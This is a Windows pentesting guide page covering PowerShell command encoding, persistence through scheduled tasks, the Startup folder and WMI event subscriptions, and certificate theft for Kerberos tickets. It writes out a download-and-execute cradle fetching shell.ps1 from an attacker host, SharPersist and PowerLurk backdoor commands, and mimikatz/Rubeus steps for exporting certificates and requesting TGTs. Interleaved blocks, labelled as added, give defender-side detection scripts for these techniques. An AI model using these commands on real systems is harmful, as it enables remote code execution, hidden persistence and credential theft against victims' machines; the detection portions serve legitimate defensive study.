The Pentesting Guide

Windows

Encoding commands

The commands you want to execute usually contain quotes and other special characters, so the safest way to run them is to encode them first (UTF-16LE, then Base64, which is the form powershell.exe -enc expects); that avoids quoting and escaping errors at execution time.

  • Windows

$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
  • Linux

str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
# quote "$str" so the shell neither word-splits nor globs it; -e is dropped so backslashes pass through untouched
echo -n "$str" | iconv -t UTF-16LE | base64 -w 0
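The reverse operation is what a defender needs when this encoding shows up in process-creation logs (Event ID 4688 with command-line auditing, or Sysmon Event ID 1). The following is an added example, not code from the page; the function name and the sample command line are constructed here, and the sample reuses the page's own <ATTACKER_IP> placeholder.

```powershell
# Added example (not from the page): decode the -enc / -EncodedCommand argument of a logged
# PowerShell command line, i.e. undo the UTF-16LE + Base64 encoding shown above, and triage it.
function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover the usual spellings.
    $m = [regex]::Match($CommandLine, '(?i)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]+=*)')
    if (-not $m.Success) { return $null }
    try {
        $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch [System.FormatException] {
        # Truncated or mangled blob (log field limits, copy/paste): report it instead of throwing.
        return [pscustomobject]@{ Decoded = $null; Suspicious = $true; Reason = 'undecodable base64' }
    }
    # Crude triage: download-and-execute cradles like the payload used on this page.
    $cradle = $decoded -match '(?i)downloadstring|downloadfile|invoke-expression|\bIEX\b|FromBase64String'
    [pscustomobject]@{
        Decoded    = $decoded
        Suspicious = $cradle
        Reason     = $(if ($cradle) { 'download/execute cradle' } else { '' })
    }
}

# Constructed sample 4688-style command line, built with the same encoding the page uses.
$payload = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
$enc = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload))
$sampleCommandLine = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc $enc"
ConvertFrom-EncodedCommandLine -CommandLine $sampleCommandLine | Format-List
```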

Task Scheduler

Create a scheduled task (named "Updater" here) that runs the encoded payload every hour.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

Drop an entry (named "UserEnvSetup" here) into the user's Startup folder so the payload runs every time that user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a permanent WMI event subscription whose consumer runs whenever a matching process starts. In this case the trigger is notepad.exe.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
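Each of the three mechanisms above (scheduled task, Startup folder, permanent WMI subscription) leaves a footprint that can be enumerated from the host. The block below is an added example written from the defender's side; it is not part of the page, SharPersist or PowerLurk, and its function names are its own. It assumes an elevated PowerShell session.

```powershell
# Added example, not from the page or from SharPersist/PowerLurk: enumerate the footprints of the
# three persistence mechanisms above. Run in an elevated PowerShell.
function Get-SuspiciousScheduledTask {
    # SharPersist -t schtask creates a task whose action is powershell.exe with an -enc payload.
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match '(?i)powershell.*\s-(?:e|ec|en|enc|encodedcommand)\s') {
                [pscustomobject]@{ Kind = 'SchTask'; Name = $task.TaskPath + $task.TaskName; Detail = $cmd }
            }
        }
    }
}
function Get-StartupFolderEntry {
    # SharPersist -t startupfolder drops a file (here "UserEnvSetup") into one of these folders.
    $folders = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
               "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    foreach ($f in Get-ChildItem -Path $folders -File -ErrorAction SilentlyContinue) {
        [pscustomobject]@{ Kind = 'Startup'; Name = $f.FullName; Detail = "written $($f.LastWriteTime)" }
    }
}
function Get-WmiPersistence {
    # A permanent subscription is an __EventFilter (WQL trigger) bound to an __EventConsumer (the action).
    $ns = 'root\subscription'
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter   -ErrorAction SilentlyContinue
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue) {
        $flt = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
        $con = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
        # CommandLineEventConsumer runs CommandLineTemplate; ActiveScriptEventConsumer runs ScriptText.
        $action = if ($con.CommandLineTemplate) { $con.CommandLineTemplate } else { $con.ScriptText }
        [pscustomobject]@{ Kind = 'WMI'; Name = "$($flt.Name) -> $($con.Name)"; Detail = "$($flt.Query) => $action" }
    }
}
# Baseline first: some Windows builds ship a BVTFilter/BVTConsumer binding and management agents
# register their own. Anything else that runs a command on process start or on a timer deserves a
# look; removal is Remove-CimInstance on the binding, then the filter and consumer.
Get-SuspiciousScheduledTask
Get-StartupFolderEntry
Get-WmiPersistence | Format-List
```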

Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not depend on any vulnerable (misconfigured) template, which makes it a reliable way to keep access. Attackers can extract certificates that have already been issued, or request new ones, and keep using them against the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine.

.\Seatbelt.exe Certificates

2. Dump the certificates with mimikatz. The exported .pfx files are protected with the password "mimikatz".

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be a local administrator to export from the machine store.

1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT for the machine account.

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT>
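To know which certificates on a host could serve as the long-lived credential this section describes, a defender inventories the same two stores the steps above export from. This is an added example, not code from the page or from Seatbelt, mimikatz or Rubeus; the function name is its own, and it reads the stores only.

```powershell
# Added example, not from the page or from Seatbelt/mimikatz/Rubeus: list certificates that can act as a
# logon credential (logon-capable EKU plus a private key) in the user and machine stores used above.
# EKUs a KDC accepts for certificate logon (PKINIT): Client Authentication and Smart Card Logon.
$LogonOids    = '1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2'
$TemplateOids = '1.3.6.1.4.1.311.21.7', '1.3.6.1.4.1.311.20.2'   # v2 template info, v1 template name
function Get-LogonCapableCert {
    param([string[]]$StorePath = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))
    foreach ($path in $StorePath) {
        foreach ($cert in (Get-ChildItem -Path $path -ErrorAction SilentlyContinue)) {
            $ekuExt = $cert.Extensions |
                Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] }
            $ekus  = @($ekuExt | ForEach-Object { $_.EnhancedKeyUsages } | ForEach-Object Value)
            $logon = @($ekus | Where-Object { $LogonOids -contains $_ }).Count -gt 0
            # Only HasPrivateKey matters: the "not exportable" flag is exactly what crypto::capi above bypasses.
            if (-not ($logon -and $cert.HasPrivateKey)) { continue }
            $tmpl = $cert.Extensions | Where-Object { $TemplateOids -contains $_.Oid.Value } | Select-Object -First 1
            [pscustomobject]@{
                Store      = $path
                Subject    = $cert.Subject
                Issuer     = $cert.Issuer
                Template   = $(if ($tmpl) { $tmpl.Format($false) } else { '' })
                Thumbprint = $cert.Thumbprint
                NotAfter   = $cert.NotAfter
                DaysLeft   = [int]($cert.NotAfter - (Get-Date)).TotalDays
            }
        }
    }
}
# A password reset leaves every one of these valid; only revocation at the CA (followed by a CRL
# refresh on the DCs) or expiry ends them. Reconcile the list against the CA's issued-certificate
# log to spot certificates nobody expected to exist.
Get-LogonCapableCert | Sort-Object DaysLeft -Descending | Format-Table -AutoSize
```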

Last updated 1 year ago